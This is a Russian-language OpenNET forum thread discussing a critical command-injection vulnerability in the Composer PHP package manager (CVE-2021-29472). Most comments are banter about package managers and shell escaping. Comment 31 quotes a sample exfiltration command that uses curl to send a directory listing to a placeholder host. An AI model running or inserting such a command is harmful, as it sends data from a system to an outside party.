The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в пакетном менеджере Composer, допускающая компрометацию PHP-репозитория Packagist"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в пакетном менеджере Composer, допускающая компрометацию PHP-репозитория Packagist"  +/
Сообщение от opennews (?), 03-Май-21, 09:24 
В менеджере зависимостей Composer выявлена критическая уязвимость (CVE-2021-29472), позволяющая выполнить произвольные команды в системе при обработке пакета со специально оформленным значением URL, определяющим адрес для загрузки исходных текстов. Проблема проявляется в компонентах GitDriver, SvnDriver и HgDriver, применяемых при использовании систем управления исходными текстами Git, Subversion и Mercurial. Уязвимость устранена в выпусках Composer 1.10.22 и 2.0.13...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=55065

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +3 +/
Сообщение от Онаним (?), 03-Май-21, 09:24 
Это не баг, это фича.
Ответить | Правка | Наверх | Cообщить модератору

2. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +9 +/
Сообщение от Онаним (?), 03-Май-21, 09:25 
(СtI/CtD = continous trojan integration / continuous trojan deployment)
Ответить | Правка | Наверх | Cообщить модератору

3. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –4 +/
Сообщение от Аноним (3), 03-Май-21, 09:43 
> ежемесячно обслуживающий более 1.4 миллиарда загрузок

Кто все эти люди? Индусы и китайцы? И это какой-то реально полезный софт?

Ответить | Правка | Наверх | Cообщить модератору

5. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Онаним (?), 03-Май-21, 09:52 
В основном это автоматические деплоеры, которым абсолютно пофиг, сколько там троянов внутри.
Ответить | Правка | Наверх | Cообщить модератору

9. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Анто769ним (?), 03-Май-21, 10:17 
А деплоят они на локалхост, ага
Ответить | Правка | Наверх | Cообщить модератору

24. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +3 +/
Сообщение от Аноним (24), 03-Май-21, 11:17 
Куча биллингов написано на php, у меня на работе, у мужа на прошлой работе, на новой crm. Все они используют композер.
Все используют композер если программируют на php, это тоже самое что maven для java.
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

41. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Онаним (?), 03-Май-21, 13:47 
"Все используют" - слишком распространённое заблуждение.
Ответить | Правка | Наверх | Cообщить модератору

4. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Аноним (4), 03-Май-21, 09:44 
Картина Репина: похапешники и безопасность
Ответить | Правка | Наверх | Cообщить модератору

6. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +6 +/
Сообщение от Онаним (?), 03-Май-21, 09:53 
Я бы сказал, девляпсы и безопасность.
Композер долго держался молодцом сравнительно со всякими npm.
Ответить | Правка | Наверх | Cообщить модератору

11. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от пох. (?), 03-Май-21, 10:50 
При комм....pear такого не было.

Потому что было как-то немодно тянуть в рот любую какашку с шитхаба. Но для обезьянок это было слишком сложно и замороченно.

Ответить | Правка | Наверх | Cообщить модератору

25. Скрыто модератором  +/
Сообщение от Dzen Python (ok), 03-Май-21, 11:18 
Ответить | Правка | Наверх | Cообщить модератору

32. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +3 +/
Сообщение от имя_ (?), 03-Май-21, 12:10 
при пир такого не было, только потому что сам пир был полухдохлый
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

39. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –2 +/
Сообщение от Lex (??), 03-Май-21, 12:56 
Так и с npm'ом все в порядке..
Для понимания разницы, уязвимость нашли не в конечном пакете которых горы, а в самом пакетном менеджере [для пыха]
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

69. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Онаним (?), 03-Май-21, 22:37 
C npm было ещё хуже, в нём package-manager-agnostic дырень проявилась.
Которая задела не только npm, а все недопакетные недоменеджеры по касательной.
Потому что сама платформа изначально делана кривыми ногами.

CVE-2019-16776
CVE-2019-16777

Ответить | Правка | Наверх | Cообщить модератору

28. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –3 +/
Сообщение от Аноним (28), 03-Май-21, 11:32 
Сделай лучше, фуле!
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

7. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от user90 (?), 03-Май-21, 09:59 
PornDriver
Ответить | Правка | Наверх | Cообщить модератору

22. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –2 +/
Сообщение от Dzen Python (ok), 03-Май-21, 11:13 
PornHubDriver
Ответить | Правка | Наверх | Cообщить модератору

10. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –3 +/
Сообщение от Аноним (10), 03-Май-21, 10:35 
Драйверы. На пхп.
Ответить | Правка | Наверх | Cообщить модератору

13. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +5 +/
Сообщение от Аноним (13), 03-Май-21, 10:58 
Дело не в PHP Такой же баг был бы на любом языке. Дело в подходе вызывать зависимости через командную строку. Это всегда дыряво. Нельзя гарантированно заэкранировать всё. С SQL это поняли и перестали пытаться экранировать. В мире linux где всё состоит из отдельных консольных программ, которые вызывают друг друга через командную строку это распространённая практика, от которой ещё долго будут отвыкать. Так что увы. Подобные баги будут повторяться.
Ответить | Правка | Наверх | Cообщить модератору

20. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –4 +/
Сообщение от Аноним (20), 03-Май-21, 11:11 
Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.
Ответить | Правка | Наверх | Cообщить модератору

26. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +6 +/
Сообщение от Аноним (24), 03-Май-21, 11:27 
Просто нужно чтобы программы писали анонимные эксперты с opennet, а не каким-то вебмакакам. Анонимные эксперты на то и эксперты что у них руки не из задницы ростут.
Ответить | Правка | Наверх | Cообщить модератору

34. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Аноним (34), 03-Май-21, 12:34 
Ну мааам
Ответить | Правка | Наверх | Cообщить модератору

36. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Dzen Python (ok), 03-Май-21, 12:41 
Да не вопрос, чувак. У тебя есть деньги на то, чтобы писали именно анонимные эксперты с опеннета? Со всеми проверками, тестированием, без постоянных сроков "надо было еще вчера" и без очешуительных правок в самый последний момент? Что такое, что мордочку-то скривил?
Ответить | Правка | К родителю #26 | Наверх | Cообщить модератору

74. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (74), 05-Май-21, 08:36 
За деньги я и сама могу.
Ответить | Правка | Наверх | Cообщить модератору

75. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (74), 05-Май-21, 09:18 
То есть вы предлагаете оплатить исправление уже исправленой уязвимости, оплатить неизвестно кому, кто с 99.9% вероятностью ничего сложного на php не писал, при этом с бесконечными сроками?

И вообще, сколько комитов вы уже сделали в composer? Покажите их.

Ответить | Правка | К родителю #36 | Наверх | Cообщить модератору

76. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Dzen Python (ok), 06-Май-21, 14:38 
> Гарантированно заэкранировать всё - можно. И надо-то для этого всего лишь руки не из задницы иметь.
> Кудох-тох-тох, эти анонимные эксперты с опеннета

Ты так и не понял, к чему это было написано, горе-разраб...

> И вообще, сколько комитов вы уже сделали в composer? Покажите их.

Разраб композера, залогинься. Все равно у меня длиннее - не в коммитах, а в нормальных сантиметрах.

Ответить | Правка | Наверх | Cообщить модератору

77. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (74), 07-Май-21, 09:29 
Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми собрался меняться.
Ответить | Правка | Наверх | Cообщить модератору

78. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Dzen Python (ok), 07-Май-21, 21:27 
> Надо понимать код ты пишешь не руками, а теми самыми сантиметрами которыми
> собрался меняться.

Надо понимать, что ты не оставляешь надежды померяться коммитами?

Ответить | Правка | Наверх | Cообщить модератору

42. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Онаним (?), 03-Май-21, 13:49 
Анонимные эксперты их собственно и пишут, просто в такие вот сводки обычно не попадают, потому что и область собственно распространения поуже "широкой макакопублики", и маразмов поменьше.
Ответить | Правка | К родителю #26 | Наверх | Cообщить модератору

21. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –2 +/
Сообщение от Dzen Python (ok), 03-Май-21, 11:12 
Альтернативы?
- Монолитный блоатварь, где все эти утилиты слеплены воедино? И страдать, если встроенный в код аналог grep'а нельзя заменить на ZZZgrep, умеющий фичу YYY, облегчающий в сценарии XXX работу, убирая много строк потенциально опасного шеллкода?
- RPC, который ломается точно так же?
Ответить | Правка | К родителю #13 | Наверх | Cообщить модератору

29. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (13), 03-Май-21, 11:38 
Не вчитывался подробно и не знаю особенностей php, но насколько я понимаю нечто подобное этому
https://github.com/libgit2/php-git решило бы проблему.
php-git2 is a PHP bindings to the libgit2 linkable C Git library.


Ответить | Правка | Наверх | Cообщить модератору

12. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (13), 03-Май-21, 10:54 
>> Аудит логов на серверах Packagist не выявил связанной с уязвимостью подозрительной активности.
>> Ошибка присутствует в коде с ноября 2011 года.

Прям с 2011 года весь аудит просмотрели?

Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –1 +/
Сообщение от Аноним (19), 03-Май-21, 11:09 
Грепнули логи, делов то
Ответить | Правка | Наверх | Cообщить модератору

14. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Анонин (?), 03-Май-21, 10:59 
Неуязвимых не бывает.
Ответить | Правка | Наверх | Cообщить модератору

15. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Аноним (13), 03-Май-21, 11:00 
>> В менеджере зависимостей Composer выявлена критическая уязвимость, позволяющая выполнить произвольные команды в системе при обработке

пакета

npm postinstall:  Уязвимость? о_О Фух, показалось...

Ответить | Правка | Наверх | Cообщить модератору

18. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Аноним (18), 03-Май-21, 11:07 
Даже например deb пакеты такое умеют.
Ответить | Правка | Наверх | Cообщить модератору

16. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –5 +/
Сообщение от Аноним (18), 03-Май-21, 11:03 
Чето в голос.
Ответить | Правка | Наверх | Cообщить модератору

17. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –5 +/
Сообщение от Dzen Python (ok), 03-Май-21, 11:07 
Никогда такого не было и вот опять...
Ответить | Правка | Наверх | Cообщить модератору

23. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –5 +/
Сообщение от Аноним (23), 03-Май-21, 11:16 
все эти composer, pip, npm для идиотов которые не знают что такое git submodules
Ответить | Правка | Наверх | Cообщить модератору

27. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +7 +/
Сообщение от Аноним (27), 03-Май-21, 11:28 
лучше покажи мне дурачка который будет использовать git submodules вместо pip, таких даже среди клинических больных поискать придётся
Ответить | Правка | Наверх | Cообщить модератору

30. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Аноним (23), 03-Май-21, 11:44 
Любой вменяемый даже если и использует всю эту дрянь, то только чтобы скачать и тут же закрепить в submodules
Ответить | Правка | Наверх | Cообщить модератору

45. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от anonymous (??), 03-Май-21, 14:45 
Возможно вам понравится Go. Ибо он тупо переиспользует git для удалённых зависимостей.
Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

33. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +4 +/
Сообщение от hshhhhh (ok), 03-Май-21, 12:23 
Все эти менеджеры зависимостей в линуксе для тех кто не осилил wget
Ответить | Правка | К родителю #23 | Наверх | Cообщить модератору

35. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +4 +/
Сообщение от YetAnotherOnanym (ok), 03-Май-21, 12:38 
И не осилил собственную графовую БД для зависимостей. Слабаки!
Ответить | Правка | Наверх | Cообщить модератору

37. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от пох. (?), 03-Май-21, 12:42 
Лошье! Только бумага и карандаш! Никаких БД!
Все зависимости должны быть отрисованы вручную и подписаны экспертом!

Ответить | Правка | Наверх | Cообщить модератору

48. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (48), 03-Май-21, 15:20 
Нужно создать единое министерство зависимостей. И ввести ответственность за выдачу заведомо ложных зависимостей.
Ответить | Правка | Наверх | Cообщить модератору

59. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от макпыф (ok), 03-Май-21, 17:50 
я предпочитаю хранить все в голове
Ответить | Правка | К родителю #37 | Наверх | Cообщить модератору

67. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от hshhhhh (ok), 03-Май-21, 21:10 
всё ещё на слакваре?
Ответить | Правка | Наверх | Cообщить модератору

68. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от макпыф (ok), 03-Май-21, 21:13 
> всё ещё на слакваре?

lfs

Ответить | Правка | Наверх | Cообщить модератору

72. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от пох. (?), 04-Май-21, 20:21 
А что, готишно... Свиток с графом зависимостей, аккуратно свешивающийся из стоящего на полке черепа... товарищмайор, возможно, не совсем одобряют охоту за головами, но, с другой стороны, много ведь и не надо. А этим, из "Сети", пару голов ведь простили и отпустили... это ж не грибы на погибель мировому империализму растить, а просто пара подвернувшихся под руку неудачников...

Я бы штук семь, пожалуй, собрал, для красивого числа.

Ответить | Правка | К родителю #59 | Наверх | Cообщить модератору

31. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  –3 +/
Сообщение от YetAnotherOnanym (ok), 03-Май-21, 11:59 
> curl http://exfiltration-host.tld --data “$(ls -alh)

Ыыыы... какая прелесть!
> в тот же день проблема была исправлена

Одного меня настораживает такая скорость?

Ответить | Правка | Наверх | Cообщить модератору

49. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +1 +/
Сообщение от Аноним (49), 03-Май-21, 15:30 
> Одного меня настораживает такая скорость?

Да.

Ответить | Правка | Наверх | Cообщить модератору

43. Скрыто модератором  –1 +/
Сообщение от Анин (?), 03-Май-21, 14:16 
Ответить | Правка | Наверх | Cообщить модератору

51. Скрыто модератором  –1 +/
Сообщение от Dzen Python (ok), 03-Май-21, 16:16 
Ответить | Правка | Наверх | Cообщить модератору

53. Скрыто модератором  +2 +/
Сообщение от Аноним (53), 03-Май-21, 16:23 
Ответить | Правка | К родителю #43 | Наверх | Cообщить модератору

54. Скрыто модератором  +/
Сообщение от Аноним (48), 03-Май-21, 16:50 
Ответить | Правка | Наверх | Cообщить модератору

66. Скрыто модератором  +/
Сообщение от Анин (?), 03-Май-21, 20:37 
Ответить | Правка | Наверх | Cообщить модератору

65. Скрыто модератором  +/
Сообщение от Анин (?), 03-Май-21, 20:36 
Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

79. "Уязвимость в пакетном менеджере Composer, допускающая компро..."  +/
Сообщение от Аноним (79), 10-Май-21, 21:34 
>которые выполняются при помощи вызова "fromShellCommandline" с передачей аргументов командной строки.

Уж сколько раз твердили миру:

юзайте API || RPC || передавайте аргументы через конфиг-файл/трубу || реализуйте, еслине реализовано || GTFO.

Но there is a sucker born every minute, желающие и ведущиеся на лёгкие пути не мамонты и не вымрут никогда.

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру